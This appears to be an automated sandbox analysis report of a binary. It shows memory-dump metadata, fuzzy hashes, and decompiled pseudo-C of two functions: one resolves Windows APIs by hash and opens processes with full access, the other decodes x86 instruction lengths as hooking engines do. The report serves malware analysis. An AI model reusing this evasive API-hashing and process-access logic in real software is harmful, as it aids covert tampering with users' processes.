0x7098a80d
0x7098a80e
0x7098a80e
0x00000000
0x7098a601
0x7098a603
0x7098a603
0x7098a605
0x7098a60c
0x7098a61a
0x7098a61c
0x7098a620
0x7098a624
0x7098a626
0x7098a654
0x7098a657
0x7098a65c
0x7098a660
0x7098a665
0x7098a66c
0x7098a671
0x7098a673
0x7098ac3a
0x7098ac4b
0x7098ac6b
0x7098ac70
0x7098ac70
0x7098a689
0x7098a68e
0x7098a68e
0x7098a68e
0x7098a68e
0x7098a6a0
0x7098a6a2
0x7098a6a4
0x7098a6b5
0x7098a6b5
0x7098a6bb
0x7098a6c0
0x7098a6c4
0x7098a6ca
0x7098a6d1
0x7098a6d6
0x7098a6d8
0x7098abee
0x7098abff
0x7098ac20
0x7098ac25
0x7098ac25
0x7098a6ef
0x7098a6f4
0x7098a6f4
0x7098a6f4
0x7098a6f4
0x7098a6f7
0x7098a6f7
0x00000000
0x7098a6f7
0x7098a62a
0x7098a62a
0x7098a62c
0x7098a63d
0x7098a63f
0x7098a641
0x00000000
0x00000000
0x7098a64d
0x7098a64e
0x7098a652
0x00000000
0x00000000
0x00000000
0x7098a652
0x7098a643
0x7098a646
0x00000000
0x00000000
0x7098a6f8
0x7098a6f8
0x7098a6f9
0x7098a6f9
0x00000000
0x7098a605
0x7098a5fb

Strings

, xrefs: 7098ABB3

Memory Dump Source

Source File: 00000004.00000002.727624069.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true

Associated: 00000004.00000002.727609301.0000000070980000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727735438.000000007099A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727759857.000000007099D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.727776829.000000007099F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: c62a9daf8dba28a161454e5cd0461372f20c162f0f0b5ad43abe91d5b399c9df
Instruction ID: 1d0f3ed054df534f125fac10997912e77af208abd3f80d54f65f0d2ed79fa17a
Opcode Fuzzy Hash: c62a9daf8dba28a161454e5cd0461372f20c162f0f0b5ad43abe91d5b399c9df
Instruction Fuzzy Hash: FB1269715082059FD715DF24C892B6EB7B5AFA5614F108A2DF8AA973E0EB30ED01CB53

Uniqueness

Uniqueness Score: -1.00%

Function 709884E4, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E709884E4(signed int __ecx, intOrPtr __edx) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t316;
				intOrPtr _t318;
				signed int* _t324;
				signed int _t325;
				signed int _t326;
				void* _t345;
				void* _t416;
				signed int _t417;
				signed int _t424;
				signed int _t432;
				intOrPtr* _t433;
				intOrPtr* _t434;
				signed int _t437;
				signed int _t441;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t450;
				void* _t451;
				signed int _t452;
				void* _t453;
				signed int _t454;
				void* _t457;
				intOrPtr* _t458;

				_push(_t435);
				_t458 = _t457 - 0xa4;
				 *_t458 = __ecx + 0x1c;
				 *((intOrPtr*)(_t458 + 0x68)) = __edx;
				 *(_t458 + 4) = __ecx;
				 *(_t458 + 0x84) = 0;
				 *((intOrPtr*)(_t458 + 0x78)) = __ecx + 4;
				while(1) {
					_t415 =  *(_t458 + 0x6c);
					E7098B714(_t458 + 0x24,  *(_t458 + 0x6c), 0x7fffffff);
					if(E7098F56C(_t458 + 0x24) == 0) {
						goto L3;
					} else {
						 *( *(_t458 + 4) + 0x2c) = 0;
						E7098F6F0(_t458 + 0x24);
					}
					L60:
					_t318 = 0xffffffffffffffff;
					L62:
					if(_t318 != 0) {
						L65:
						return _t318;
					} else {
						if( *(_t458 + 0x84) != 0x20) {
							E7099218C(0x5dc, _t415, _t435);
							 *(_t458 + 0x84) =  *(_t458 + 0x84) + 1;
							continue;
						} else {
							_t318 = 0xffffffffffffffff;
							goto L65;
						}
					}
					L71:
					L3:
					__eflags =  *( *(_t458 + 4));
					if( *( *(_t458 + 4)) > 0) {
						_t326 = 0;
						__eflags = 0;
						do {
							 *(_t458 + 0x64) = _t326 * 4;
							_t434 = E7098F558( *(_t458 + 0x7c), _t326 * 4);
							_t435 =  *(_t458 + 0x20);
							__eflags = _t435;
							if(_t435 <= 0) {
								L11:
								_t435 =  *(_t458 + 4) + 4;
								_t283 = E7098F568( *(_t458 + 4) + 4);
								__eflags = _t283 -  *(_t458 + 0x64);
								if(_t283 >  *(_t458 + 0x64)) {
									_t451 = 4 + _t326 * 4;
									_t299 = E7098F568(_t435);
									__eflags = _t299 - _t451;
									if(_t299 > _t451) {
										 *((intOrPtr*)(_t458 + 0x9c)) = E7098F558(_t435,  *(_t458 + 0x64));
										 *((intOrPtr*)(_t458 + 0x98)) = E7098F558(_t435, _t451);
										E7099382C( *((intOrPtr*)(_t458 + 0xa4)),  *((intOrPtr*)(_t458 + 0x9c)), E7098F568(_t435) - _t451);
										_t458 = _t458 + 0xc;
									}
									E7098F8C4(_t435, E7098F568(_t435) + 0xfffffffc);
									_t308 =  *(_t458 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t450 = E70992F8C(0xa5eabdf8, 0x2c2324e8);
								__eflags = _t450;
								if(_t450 != 0) {
									 *_t450( *(E7098F558( *(_t458 + 4),  *(_t458 + 0x64))));
								}
								_t285 = E7098F568( *_t458);
								__eflags = _t285 -  *(_t458 + 0x64);
								if(_t285 >  *(_t458 + 0x64)) {
									_t453 = 4 + _t326 * 4;
									_t287 = E7098F568( *_t458);
									__eflags = _t287 - _t453;
									if(_t287 > _t453) {
										_t435 = E7098F558( *(_t458 + 4),  *(_t458 + 0x64));
										 *((intOrPtr*)(_t458 + 0xa0)) = E7098F558( *(_t458 + 4), _t453);
										E7099382C(_t288,  *((intOrPtr*)(_t458 + 0xa4)), E7098F568( *_t458) - _t453);
										_t458 = _t458 + 0xc;
									}
									E7098F8C4( *(_t458 + 4), E7098F568( *_t458) + 0xfffffffc);
									_t296 =  *(_t458 + 4);
									_t33 = _t296 + 0x18;
									 *_t33 =  *(_t296 + 0x18) - 1;
									__eflags =  *_t33;
								}
								_t326 = _t326 - 1;
								__eflags = _t326;
							} else {
								_t452 = 0;
								__eflags = 0;
								while(1) {
									_t310 = E7098F558(_t458 + 0x28, _t452 * 4);
									__eflags =  *_t310 -  *_t434;
									if( *_t310 ==  *_t434) {
										break;
									}
									_t452 = _t452 + 1;
									__eflags = _t452 - _t435;
									if(_t452 < _t435) {
										continue;
									} else {
										goto L11;
									}
									goto L20;
								}
								__eflags = _t452 - 0xffffffff;
								if(_t452 == 0xffffffff) {
									goto L11;
								} else {
								}
							}
							L20:
							_t326 = _t326 + 1;
							__eflags = _t326 -  *( *(_t458 + 4));
						} while (_t326 <  *( *(_t458 + 4)));
					}
					__eflags =  *(_t458 + 0x20);
					if( *(_t458 + 0x20) > 0) {
						_t325 = 0;
						__eflags = 0;
						do {
							 *(_t458 + 0x7c) = _t325 * 4;
							_t433 = E7098F558(_t458 + 0x28, _t325 * 4);
							_t258 =  *(_t458 + 4);
							_t435 =  *_t258;
							__eflags = _t435;
							if(_t435 <= 0) {
								L29:
								_t445 = E70992F8C(0x4bcc7cba, 0x997e6547);
								__eflags = _t445;
								if(_t445 != 0) {
									_t447 =  *_t445(0x1fffff, 0,  *((intOrPtr*)(E7098F558(_t458 + 0x28,  *(_t458 + 0x7c)))));
									__eflags = _t447;
									if(_t447 != 0) {
										E7098F8C4( *(_t458 + 4), E7098F568( *_t458) + 4);
										 *(E7098F558( *(_t458 + 4), E7098F568( *_t458) + 0xfffffffc)) = _t447;
										 *((intOrPtr*)( *((intOrPtr*)(_t458 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t458 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E7098F558(_t458 + 0x28,  *(_t458 + 0x7c));
										 *((intOrPtr*)(_t458 + 0x70)) =  *(_t458 + 4) + 4;
										E7098F8C4( *((intOrPtr*)(_t458 + 0x74)), E7098F568( *(_t458 + 4) + 4) + 4);
										 *((intOrPtr*)(E7098F558( *((intOrPtr*)(_t458 + 0x74)), E7098F568( *((intOrPtr*)(_t458 + 0x70))) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t458 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
							} else {
								_t446 = 0;
								__eflags = 0;
								 *(_t458 + 0x88) =  &(_t258[1]);
								while(1) {
									_t279 = E7098F558( *((intOrPtr*)(_t458 + 0x8c)), _t446 * 4);
									__eflags =  *_t279 -  *_t433;
									if( *_t279 ==  *_t433) {
										break;
									}
									_t446 = _t446 + 1;
									__eflags = _t446 - _t435;
									if(_t446 < _t435) {
										continue;
									} else {
										goto L29;
									}
									goto L32;
								}
								__eflags = _t446 - 0xffffffff;
								if(_t446 == 0xffffffff) {
									goto L29;
								} else {
								}
							}
							L32:
							_t325 = _t325 + 1;
							__eflags = _t325 -  *(_t458 + 0x20);
						} while (_t325 <  *(_t458 + 0x20));
					}
					E7098F6F0(_t458 + 0x24);
					_t173 =  *(_t458 + 4);
					__eflags = _t173[0xb];
					if(_t173[0xb] != 0) {
						_t432 =  *_t173;
						__eflags = _t432;
						if(_t432 > 0) {
							_t435 = 0;
							__eflags = 0;
							_t324 =  &(_t173[1]);
							while(1) {
								_t441 = _t435 * 4;
								_t217 = E7098F558(_t324, _t441);
								_t218 =  *(_t458 + 4);
								__eflags =  *_t217 -  *((intOrPtr*)(_t218 + 0x30));
								if( *_t217 ==  *((intOrPtr*)(_t218 + 0x30))) {
									break;
								}
								_t435 = _t435 + 1;
								__eflags = _t435 - _t432;
								if(_t435 < _t432) {
									continue;
								}
								goto L46;
							}
							__eflags = _t435 - 0xffffffff;
							if(_t435 != 0xffffffff) {
								_t219 = E7098F568( *_t458);
								__eflags = _t219 - _t441;
								if(_t219 > _t441) {
									 *((intOrPtr*)(_t458 + 0x74)) = 4 + _t435 * 4;
									_t247 = E7098F568( *_t458);
									__eflags = _t247 -  *((intOrPtr*)(_t458 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t458 + 0x74))) {
										 *((intOrPtr*)(_t458 + 0x90)) = E7098F558( *(_t458 + 4), _t441);
										 *((intOrPtr*)(_t458 + 0x8c)) = E7098F558( *(_t458 + 4),  *((intOrPtr*)(_t458 + 0x74)));
										E7099382C( *((intOrPtr*)(_t458 + 0x98)),  *((intOrPtr*)(_t458 + 0x90)), E7098F568( *_t458) -  *((intOrPtr*)(_t458 + 0x74)));
										_t458 = _t458 + 0xc;
									}
									E7098F8C4( *(_t458 + 4), E7098F568( *_t458) + 0xfffffffc);
									_t424 =  *(_t458 + 4);
									_t75 = _t424 + 0x18;
									 *_t75 =  *(_t424 + 0x18) - 1;
									__eflags =  *_t75;
								}
								_t220 = E7098F568(_t324);
								__eflags = _t220 - _t441;
								if(_t220 > _t441) {
									_t435 = 4 + _t435 * 4;
									_t237 = E7098F568(_t324);
									__eflags = _t237 - _t435;
									if(_t237 > _t435) {
										_t238 = E7098F558(_t324, _t441);
										 *((intOrPtr*)(_t458 + 0x94)) = E7098F558(_t324, _t435);
										E7099382C(_t238,  *((intOrPtr*)(_t458 + 0x98)), E7098F568(_t324) - _t435);
										_t458 = _t458 + 0xc;
									}
									E7098F8C4(_t324, E7098F568(_t324) + 0xfffffffc);
									_t246 =  *(_t458 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E7098F8C4( *(_t458 + 4), E7098F568( *_t458) + 4);
								 *(E7098F558( *(_t458 + 4), E7098F568( *_t458) + 0xfffffffc)) =  *( *(_t458 + 4) + 0x2c);
								 *((intOrPtr*)( *(_t458 + 4) + 0x18)) =  *((intOrPtr*)( *(_t458 + 4) + 0x18)) + 1;
								E7098F8C4(_t324, E7098F568(_t324) + 4);
								 *((intOrPtr*)(E7098F558(_t324, E7098F568(_t324) + 0xfffffffc))) =  *((intOrPtr*)( *(_t458 + 4) + 0x30));
								 *( *(_t458 + 4)) =  *( *(_t458 + 4)) + 1;
							}
						}
					}
					L46:
					 *((intOrPtr*)(_t458 + 8)) = 0;
					 *((intOrPtr*)(_t458 + 0xc)) = 0;
					E7098F620(_t458 + 0x14, 0);
					 *((intOrPtr*)(_t458 + 0x34)) =  *((intOrPtr*)(_t458 + 0x68));
					 *((intOrPtr*)(_t458 + 0x38)) = 0;
					E7098F620(_t458 + 0x40, 0);
					_t178 =  *(_t458 + 4);
					_t416 = 0x40;
					__eflags =  *((intOrPtr*)(_t178 + 0x18)) - 0x40;
					_t417 =  <  ?  *((void*)(_t178 + 0x18)) : _t416;
					 *(_t458 + 0x80) = _t417;
					__eflags = _t417;
					if(_t417 <= 0) {
						L57:
						_t415 = E7098F558(_t458 + 0x14, 0);
						_t180 = E70992878( *((intOrPtr*)(_t458 + 0xc)), _t179, 0x3e8);
						_t132 = _t180 - 0x80; // -128
						_t181 = _t132;
						__eflags = _t181 - 0x3f;
						_t316 =  <=  ? _t181 : _t180;
						__eflags = _t316 - 0x102;
						if(_t316 == 0x102) {
							goto L59;
						} else {
							__eflags = _t316 - 0x3f;
							if(_t316 <= 0x3f) {
								__eflags = _t316 << 2;
								 *((intOrPtr*)( *((intOrPtr*)(_t458 + 8)) + 0x2c)) =  *((intOrPtr*)(E7098F558( *(_t458 + 4), _t316 << 2)));
								_t188 = E7098F558( *(_t458 + 0x7c), _t316 << 2);
								_t415 =  *(_t458 + 4);
								 *((intOrPtr*)(_t415 + 0x30)) =  *_t188;
								_t318 =  *((intOrPtr*)(_t415 + 0x2c));
								E7098B680(_t458 + 0x34);
								E7098B680(_t458 + 8);
							} else {
								goto L59;
							}
						}
						goto L62;
					} else {
						_t454 = 0;
						__eflags = 0;
						while(1) {
							E7098CB48(_t458 + 0x4c);
							_t415 = 0;
							_t345 = _t458 + 0x4c;
							 *((char*)(_t345 + 4)) = 0;
							 *((intOrPtr*)(_t345 + 0x20)) = 0;
							__eflags = E7098C33C(_t345);
							if(__eflags != 0) {
								break;
							}
							E7098F8C4(_t458 + 0x14, E7098F568(_t458 + 0x10) + 4);
							 *((intOrPtr*)(E7098F558(_t458 + 0x14, E7098F568(_t458 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t458 + 0x4c));
							 *((intOrPtr*)(_t458 + 0xc)) =  *((intOrPtr*)(_t458 + 0xc)) + 1;
							_t202 = E70992F8C(0xa5eabdf8, 0xf3119fba);
							__eflags = _t202;
							if(_t202 == 0) {
								_t415 =  *(_t458 + 0x6c);
								__eflags = _t415;
								if(__eflags == 0) {
									break;
								} else {
									__eflags = _t415 - 0xffffffff;
									if(__eflags != 0) {
										E7098F8C4(_t458 + 0x40, E7098F568(_t458 + 0x3c) + 4);
										 *(E7098F558(_t458 + 0x40, E7098F568(_t458 + 0x3c) + 0xfffffffc)) =  *(_t458 + 0x6c);
										 *((intOrPtr*)(_t458 + 0x4c - 0x14)) =  *((intOrPtr*)(_t458 + 0x4c - 0x14)) + 1;
										E7098CDE0(_t458 + 0x4c, __eflags);
										_t454 = _t454 + 1;
										__eflags = _t454 -  *(_t458 + 0x80);
										if(_t454 <  *(_t458 + 0x80)) {
											continue;
										} else {
											_t437 = 0;
											__eflags = 0;
											do {
												_t211 = E7098F558( *(_t458 + 4), _t437 * 4);
												_t212 = E7098F558(_t458 + 0x40, _t437 * 4);
												E70988C14( *_t211, E7099034C(0xa5eabdf8, 0x4145240a),  *_t212, 0, 0);
												_t437 = _t437 + 1;
												__eflags = _t437 -  *(_t458 + 0x80);
											} while (_t437 <  *(_t458 + 0x80));
											goto L57;
										}
									} else {
										break;
									}
								}
							} else {
								__eflags = 0;
								_push(2);
								_push(0);
								_push(0);
								_push(_t458 + 0x6c);
								_push( *((intOrPtr*)(_t458 + 0x78)));
								_push( *((intOrPtr*)(_t458 + 0x60)));
								_push(0xffffffff);
								asm("int3");
								return _t202;
							}
							goto L71;
						}
						E7098CDE0(_t458 + 0x4c, __eflags);
						L59:
						E7098B680(_t458 + 0x34);
						E7098B680(_t458 + 8);
						goto L60;
					}
					goto L71;
				}
			}

0x709884e4
0x709884e8
0x709884f1
0x709884f7
0x709884fb
0x709884ff
0x7098850a
0x7098850e
0x70988513
0x7098851b
0x7098852b
0x00000000
0x7098852d
0x70988535
0x7098853c
0x7098853c
0x70988a8f
0x70988a91
0x70988ad2
0x70988ad4
0x70988ae3
0x70988aef
0x70988ad6
0x70988ade
0x70988af5
0x70988afa
0x00000000
0x70988ae0
0x70988ae2
0x00000000
0x70988ae2
0x70988ade
0x00000000
0x70988546
0x7098854a
0x7098854d
0x70988553
0x70988553
0x70988555
0x7098855c
0x7098856a
0x7098856c
0x70988570
0x70988572
0x7098859e
0x709885a2
0x709885a7
0x709885ac
0x709885b0
0x709885b4
0x709885bb
0x709885c0
0x709885c2
0x70988b51
0x70988b60
0x70988b7f
0x70988b84
0x70988b84
0x709885d5
0x709885da
0x709885de
0x709885de
0x709885de
0x709885ef
0x709885f1
0x709885f3
0x70988604
0x70988604
0x70988609
0x7098860e
0x70988612
0x70988617
0x7098861e
0x70988623
0x70988625
0x70988b13
0x70988b1f
0x70988b39
0x70988b3e
0x70988b3e
0x7098863b
0x70988640
0x70988644
0x70988644
0x70988644
0x70988644
0x70988647
0x70988647
0x70988574
0x70988576
0x70988576
0x70988578
0x70988584
0x7098858b
0x7098858d
0x00000000
0x00000000
0x70988599
0x7098859a
0x7098859c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x7098859c
0x7098858f
0x70988592
0x00000000
0x00000000
0x70988594
0x70988592
0x70988648
0x7098864c
0x7098864d
0x7098864d
0x70988555
0x70988655
0x7098865a
0x70988660
0x70988660
0x70988662
0x70988669
0x70988677
0x70988679
0x7098867d
0x7098867f
0x70988681
0x709886bc
0x709886cb
0x709886cd
0x709886cf
0x709886ed
0x709886ef
0x709886f1
0x70988703
0x70988721
0x7098872a
0x7098872d
0x7098873b
0x7098874c
0x7098876a
0x7098876c
0x70988770
0x70988770
0x70988770
0x709886f1
0x70988683
0x70988687
0x70988687
0x7098868c
0x70988693
0x709886a2
0x709886a9
0x709886ab
0x00000000
0x00000000
0x709886b7
0x709886b8
0x709886ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x709886ba
0x709886ad
0x709886b0
0x00000000
0x00000000
0x709886b2
0x709886b0
0x70988772
0x70988772
0x70988773
0x70988773
0x70988662
0x70988781
0x70988786
0x7098878a
0x7098878e
0x70988794
0x70988796
0x70988798
0x709887a2
0x709887a2
0x709887a4
0x709887a7
0x709887a9
0x709887b1
0x709887b8
0x709887bc
0x709887bf
0x00000000
0x00000000
0x709888bb
0x709888bc
0x709888be
0x00000000
0x00000000
0x00000000
0x709888be
0x709887c5
0x709887c8
0x709887d1
0x709887d6
0x709887d8
0x709887e4
0x709887e8
0x709887ed
0x709887f1
0x70988bce
0x70988be2
0x70988c04
0x70988c09
0x70988c09
0x70988807
0x7098880c
0x70988810
0x70988810
0x70988810
0x70988810
0x70988815
0x7098881a
0x7098881c
0x70988820
0x70988827
0x7098882c
0x7098882e
0x70988b8f
0x70988b9e
0x70988bb7
0x70988bbc
0x70988bbc
0x70988841
0x70988846
0x7098884a
0x7098884a
0x7098884a
0x7098885c
0x7098887d
0x70988885
0x70988893
0x709888b1
0x709888b7
0x709888b7
0x709887c8
0x70988798
0x709888c4
0x709888c6
0x709888ca
0x709888d3
0x709888de
0x709888e2
0x709888eb
0x709888f0
0x709888f6
0x709888f7
0x709888fb
0x709888ff
0x70988906
0x70988908
0x70988a48
0x70988a59
0x70988a60
0x70988a67
0x70988a67
0x70988a6a
0x70988a6d
0x70988a70
0x70988a76
0x00000000
0x70988a78
0x70988a78
0x70988a7b
0x70988a94
0x70988aac
0x70988aaf
0x70988ab4
0x70988abe
0x70988ac1
0x70988ac4
0x70988acd
0x00000000
0x00000000
0x00000000
0x70988a7b
0x00000000
0x7098890e
0x70988910
0x70988910
0x70988912
0x70988916
0x7098891b
0x7098891d
0x70988921
0x70988924
0x7098892c
0x7098892e
0x00000000
0x00000000
0x70988945
0x70988960
0x70988962
0x70988970
0x70988975
0x70988977
0x70988994
0x70988998
0x7098899a
0x00000000
0x7098899c
0x7098899c
0x7098899f
0x709889c0
0x709889df
0x709889e5
0x709889e8
0x709889ed
0x709889ee
0x709889f5
0x00000000
0x709889fb
0x709889fd
0x709889fd
0x709889ff
0x70988a0b
0x70988a17
0x70988a39
0x70988a3e
0x70988a3f
0x70988a3f
0x00000000
0x709889ff
0x00000000
0x00000000
0x00000000
0x7098899f
0x70988979
0x70988979
0x7098897f
0x70988981
0x70988982
0x70988983
0x70988984
0x70988988
0x7098898c
0x7098898e
0x7098898f
0x7098898f
0x00000000
0x70988977
0x709889a5
0x70988a7d
0x70988a81
0x70988a8a
0x00000000
0x70988a8a
0x00000000
0x70988908

Strings

, xrefs: 70988AD6

Memory Dump Source

Source File: 00000004.00000002.727624069.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true

Associated: 00000004.00000002.727609301.0000000070980000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727735438.000000007099A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727759857.000000007099D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.727776829.000000007099F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 7789571b791fbddc5c12bb3bfe1020c8ae27195bcf9eda4ceeed74e3e4e8d1e4
Instruction ID: a4db7c9c0a33df51fd03db0165b19e0b2697cbdb5b4e5342471ce7ba8047a5de
Opcode Fuzzy Hash: 7789571b791fbddc5c12bb3bfe1020c8ae27195bcf9eda4ceeed74e3e4e8d1e4
Instruction Fuzzy Hash: FC1248712082449FC714DF24C991B6EB7E5AFA5618F204A2DF5AA973E0EB30ED04CB53

Uniqueness

Uniqueness Score: -1.00%

Function 709992DC, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E709992DC(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E709935D4( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
